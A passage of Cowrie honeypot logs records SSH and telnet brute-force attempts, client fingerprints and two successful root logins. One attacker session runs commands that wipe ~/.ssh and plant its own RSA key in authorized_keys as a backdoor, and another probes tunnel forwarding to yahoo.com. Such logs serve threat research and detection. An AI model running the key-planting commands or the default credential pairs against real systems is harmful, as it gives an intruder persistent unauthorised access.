4@openssh.com","umac-128@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-md5","hmac-sha2-256-96","hmac-sha2-512-96","hmac-sha1-96","hmac-md5-96"],"compCS":["zlib@openssh.com","zlib","none"],"langCS":[""],"message":"SSH client hassh fingerprint: fda360b1b4f4d3455cb75c6e7edb1d11","sensor":"my-vps","timestamp":"2025-08-26T13:41:16.087704Z","src_ip":"212.227.125.160","session":"b62ad85495b8"}
{"eventid":"cowrie.login.failed","username":"installer","password":"installer","message":"login attempt [installer/installer] failed","sensor":"my-vps","timestamp":"2025-08-26T13:41:25.251880Z","src_ip":"212.227.125.160","session":"b62ad85495b8"}
{"eventid":"cowrie.session.closed","duration":"15.4","message":"Connection lost after 15.4 seconds","sensor":"my-vps","timestamp":"2025-08-26T13:41:27.817184Z","src_ip":"212.227.125.160","session":"b62ad85495b8"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":59028,"dst_ip":"1.2.3.4","dst_port":23,"session":"1dabc7dd1f97","protocol":"telnet","message":"New connection: 212.227.125.160:59028 (1.2.3.4:23) [session: 1dabc7dd1f97]","sensor":"my-vps","timestamp":"2025-08-26T13:41:45.827826Z"}
{"eventid":"cowrie.session.connect","src_ip":"167.99.49.89","src_port":55996,"dst_ip":"1.2.3.4","dst_port":22,"session":"44d1b76ec305","protocol":"ssh","message":"New connection: 167.99.49.89:55996 (1.2.3.4:22) [session: 44d1b76ec305]","sensor":"my-vps","timestamp":"2025-08-26T13:41:51.512349Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T13:41:51.513110Z","src_ip":"167.99.49.89","session":"44d1b76ec305"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T13:41:51.604381Z","src_ip":"167.99.49.89","session":"44d1b76ec305"}
{"eventid":"cowrie.login.failed","username":"tomcat","password":"123456","message":"login attempt [tomcat/123456] failed","sensor":"my-vps","timestamp":"2025-08-26T13:41:52.012138Z","src_ip":"167.99.49.89","session":"44d1b76ec305"}
{"eventid":"cowrie.session.closed","duration":"1.6","message":"Connection lost after 1.6 seconds","sensor":"my-vps","timestamp":"2025-08-26T13:41:53.106616Z","src_ip":"167.99.49.89","session":"44d1b76ec305"}
{"eventid":"cowrie.session.closed","duration":13.969201803207397,"message":"Connection lost after 13 seconds","sensor":"my-vps","timestamp":"2025-08-26T13:41:59.796955Z","src_ip":"212.227.125.160","session":"1dabc7dd1f97"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":60482,"dst_ip":"1.2.3.4","dst_port":22,"session":"f5e46e34918b","protocol":"ssh","message":"New connection: 212.227.235.229:60482 (1.2.3.4:22) [session: f5e46e34918b]","sensor":"my-vps","timestamp":"2025-08-26T13:42:03.351323Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T13:42:03.352498Z","src_ip":"212.227.235.229","session":"f5e46e34918b"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T13:42:03.585943Z","src_ip":"212.227.235.229","session":"f5e46e34918b"}
{"eventid":"cowrie.login.failed","username":"hadoop","password":"123456","message":"login attempt [hadoop/123456] failed","sensor":"my-vps","timestamp":"2025-08-26T13:42:04.518920Z","src_ip":"212.227.235.229","session":"f5e46e34918b"}
{"eventid":"cowrie.session.closed","duration":"2.4","message":"Connection lost after 2.4 seconds","sensor":"my-vps","timestamp":"2025-08-26T13:42:05.754287Z","src_ip":"212.227.235.229","session":"f5e46e34918b"}
{"eventid":"cowrie.session.closed","duration":"120.0","message":"Connection lost after 120.0 seconds","sensor":"my-vps","timestamp":"2025-08-26T13:42:24.047259Z","src_ip":"212.227.235.229","session":"91944fd1b77a"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":55066,"dst_ip":"1.2.3.4","dst_port":22,"session":"cce2163770cb","protocol":"ssh","message":"New connection: 212.227.125.160:55066 (1.2.3.4:22) [session: cce2163770cb]","sensor":"my-vps","timestamp":"2025-08-26T13:42:31.213288Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-AsyncSSH_2.1.0","message":"Remote SSH version: SSH-2.0-AsyncSSH_2.1.0","sensor":"my-vps","timestamp":"2025-08-26T13:42:31.221314Z","src_ip":"212.227.125.160","session":"cce2163770cb"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":30000,"dst_ip":"1.2.3.4","dst_port":23,"session":"da0b31c49a08","protocol":"telnet","message":"New connection: 212.227.125.160:30000 (1.2.3.4:23) [session: da0b31c49a08]","sensor":"my-vps","timestamp":"2025-08-26T13:42:35.132908Z"}
{"eventid":"cowrie.client.kex","hassh":"fda360b1b4f4d3455cb75c6e7edb1d11","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,curve448-sha512,ecdh-sha2-nistp521,ecdh-sha2-nistp384,ecdh-sha2-nistp256,ecdh-sha2-1.3.132.0.10,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha256,diffie-hellman-group15-sha512,diffie-hellman-group16-sha512,diffie-hellman-group17-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,rsa2048-sha256,rsa1024-sha1,ext-info-c;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,aes192-cbc,aes128-cbc,3des-cbc,blowfish-cbc,cast128-cbc,arcfour256,arcfour128,arcfour;umac-64-etm@openssh.com,umac-128-etm@openssh.com,hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha1-etm@openssh.com,hmac-md5-etm@openssh.com,hmac-sha2-256-96-etm@openssh.com,hmac-sha2-512-96-etm@openssh.com,hmac-sha1-96-etm@openssh.com,hmac-md5-96-etm@openssh.com,umac-64@openssh.com,umac-128@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-md5,hmac-sha2-256-96,hmac-sha2-512-96,hmac-sha1-96,hmac-md5-96;zlib@openssh.com,zlib,none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","curve448-sha512","ecdh-sha2-nistp521","ecdh-sha2-nistp384","ecdh-sha2-nistp256","ecdh-sha2-1.3.132.0.10","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group14-sha256","diffie-hellman-group15-sha512","diffie-hellman-group16-sha512","diffie-hellman-group17-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","rsa2048-sha256","rsa1024-sha1","ext-info-c"],"keyAlgs":["ssh-ed25519-cert-v01@openssh.com","ssh-ed448-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-1.3.132.0.10-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ssh-ed25519","ssh-ed448","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","ecdsa-sha2-1.3.132.0.10","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","aes192-cbc","aes128-cbc","3des-cbc","blowfish-cbc","cast128-cbc","arcfour256","arcfour128","arcfour"],"macCS":["umac-64-etm@openssh.com","umac-128-etm@openssh.com","hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha1-etm@openssh.com","hmac-md5-etm@openssh.com","hmac-sha2-256-96-etm@openssh.com","hmac-sha2-512-96-etm@openssh.com","hmac-sha1-96-etm@openssh.com","hmac-md5-96-etm@openssh.com","umac-64@openssh.com","umac-128@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-md5","hmac-sha2-256-96","hmac-sha2-512-96","hmac-sha1-96","hmac-md5-96"],"compCS":["zlib@openssh.com","zlib","none"],"langCS":[""],"message":"SSH client hassh fingerprint: fda360b1b4f4d3455cb75c6e7edb1d11","sensor":"my-vps","timestamp":"2025-08-26T13:42:39.492548Z","src_ip":"212.227.125.160","session":"cce2163770cb"}
{"eventid":"cowrie.login.failed","username":"admin","password":"admin","message":"login attempt [admin/admin] failed","sensor":"my-vps","timestamp":"2025-08-26T13:42:46.687147Z","src_ip":"212.227.125.160","session":"cce2163770cb"}
{"eventid":"cowrie.session.closed","duration":"17.7","message":"Connection lost after 17.7 seconds","sensor":"my-vps","timestamp":"2025-08-26T13:42:48.873826Z","src_ip":"212.227.125.160","session":"cce2163770cb"}
{"eventid":"cowrie.session.connect","src_ip":"213.209.150.239","src_port":50993,"dst_ip":"1.2.3.4","dst_port":22,"session":"6e12e3fff587","protocol":"ssh","message":"New connection: 213.209.150.239:50993 (1.2.3.4:22) [session: 6e12e3fff587]","sensor":"my-vps","timestamp":"2025-08-26T13:42:50.829848Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-26T13:42:50.830845Z","src_ip":"213.209.150.239","session":"6e12e3fff587"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-26T13:42:50.887565Z","src_ip":"213.209.150.239","session":"6e12e3fff587"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-26T13:42:51.171754Z","src_ip":"213.209.150.239","session":"6e12e3fff587"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"74.6.143.26","dst_port":80,"src_ip":"213.209.150.239","src_port":891,"message":"direct-tcp connection request to 74.6.143.26:80 from 127.0.0.1:891","sensor":"my-vps","timestamp":"2025-08-26T13:42:51.229390Z","session":"6e12e3fff587"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"74.6.143.26","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 74.6.143.26:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T13:42:51.286250Z","src_ip":"213.209.150.239","session":"6e12e3fff587"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:124:1507::f001","dst_port":80,"src_ip":"213.209.150.239","src_port":7462,"message":"direct-tcp connection request to 2001:4998:124:1507::f001:80 from 127.0.0.1:7462","sensor":"my-vps","timestamp":"2025-08-26T13:42:51.443308Z","session":"6e12e3fff587"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:124:1507::f001","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 2001:4998:124:1507::f001:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T13:42:51.500134Z","src_ip":"213.209.150.239","session":"6e12e3fff587"}
{"eventid":"cowrie.session.closed","duration":"0.7","message":"Connection lost after 0.7 seconds","sensor":"my-vps","timestamp":"2025-08-26T13:42:51.558193Z","src_ip":"213.209.150.239","session":"6e12e3fff587"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":50739,"dst_ip":"1.2.3.4","dst_port":22,"session":"6f7efbb47dcb","protocol":"ssh","message":"New connection: 212.227.235.229:50739 (1.2.3.4:22) [session: 6f7efbb47dcb]","sensor":"my-vps","timestamp":"2025-08-26T13:42:53.474934Z"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":47831,"dst_ip":"1.2.3.4","dst_port":23,"session":"f13b3ff52917","protocol":"telnet","message":"New connection: 212.227.235.229:47831 (1.2.3.4:23) [session: f13b3ff52917]","sensor":"my-vps","timestamp":"2025-08-26T13:42:54.410798Z"}
{"eventid":"cowrie.session.closed","duration":19.81384015083313,"message":"Connection lost after 19 seconds","sensor":"my-vps","timestamp":"2025-08-26T13:42:54.944944Z","src_ip":"212.227.125.160","session":"da0b31c49a08"}
{"eventid":"cowrie.session.connect","src_ip":"167.99.49.89","src_port":60880,"dst_ip":"1.2.3.4","dst_port":22,"session":"8bd7dcb12307","protocol":"ssh","message":"New connection: 167.99.49.89:60880 (1.2.3.4:22) [session: 8bd7dcb12307]","sensor":"my-vps","timestamp":"2025-08-26T13:42:55.381441Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T13:42:55.382169Z","src_ip":"167.99.49.89","session":"8bd7dcb12307"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T13:42:55.473992Z","src_ip":"167.99.49.89","session":"8bd7dcb12307"}
{"eventid":"cowrie.login.success","username":"root","password":"Admin$123","message":"login attempt [root/Admin$123] succeeded","sensor":"my-vps","timestamp":"2025-08-26T13:42:55.883490Z","src_ip":"167.99.49.89","session":"8bd7dcb12307"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T13:42:56.117852Z","src_ip":"167.99.49.89","session":"8bd7dcb12307"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-26T13:42:56.118714Z","src_ip":"167.99.49.89","session":"8bd7dcb12307"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-26T13:42:56.120193Z","src_ip":"167.99.49.89","session":"8bd7dcb12307"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.1","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.1 seconds","sensor":"my-vps","timestamp":"2025-08-26T13:42:56.213116Z","src_ip":"167.99.49.89","session":"8bd7dcb12307"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T13:42:56.463532Z","src_ip":"167.99.49.89","session":"8bd7dcb12307"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-08-26T13:42:56.464262Z","src_ip":"167.99.49.89","session":"8bd7dcb12307"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-08-26T13:42:56.558093Z","src_ip":"167.99.49.89","session":"8bd7dcb12307"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.1","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.1 seconds","sensor":"my-vps","timestamp":"2025-08-26T13:42:56.559129Z","src_ip":"167.99.49.89","session":"8bd7dcb12307"}
{"eventid":"cowrie.session.connect","src_ip":"167.99.49.89","src_port":60892,"dst_ip":"1.2.3.4","dst_port":22,"session":"dcab986d0cdf","protocol":"ssh","message":"New connection: 167.99.49.89:60892 (1.2.3.4:22) [session: dcab986d0cdf]","sensor":"my-vps","timestamp":"2025-08-26T13:42:56.645245Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T13:42:56.646231Z","src_ip":"167.99.49.89","session":"dcab986d0cdf"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T13:42:56.735044Z","src_ip":"167.99.49.89","session":"dcab986d0cdf"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-08-26T13:42:57.133547Z","src_ip":"167.99.49.89","session":"dcab986d0cdf"}
{"eventid":"cowrie.session.closed","duration":"1.6","message":"Connection lost after 1.6 seconds","sensor":"my-vps","timestamp":"2025-08-26T13:42:58.225072Z","src_ip":"167.99.49.89","session":"dcab986d0cdf"}
{"eventid":"cowrie.session.connect","src_ip":"167.99.49.89","src_port":60906,"dst_ip":"1.2.3.4","dst_port":22,"session":"fb618f1b6d19","protocol":"ssh","message":"New connection: 167.99.49.89:60906 (1.2.3.4:22) [session: fb618f1b6d19]","sensor":"my-vps","timestamp":"2025-08-26T13:42:58.315015Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T13:42:58.316034Z","src_ip":"167.99.49.89","session":"fb618f1b6d19"}
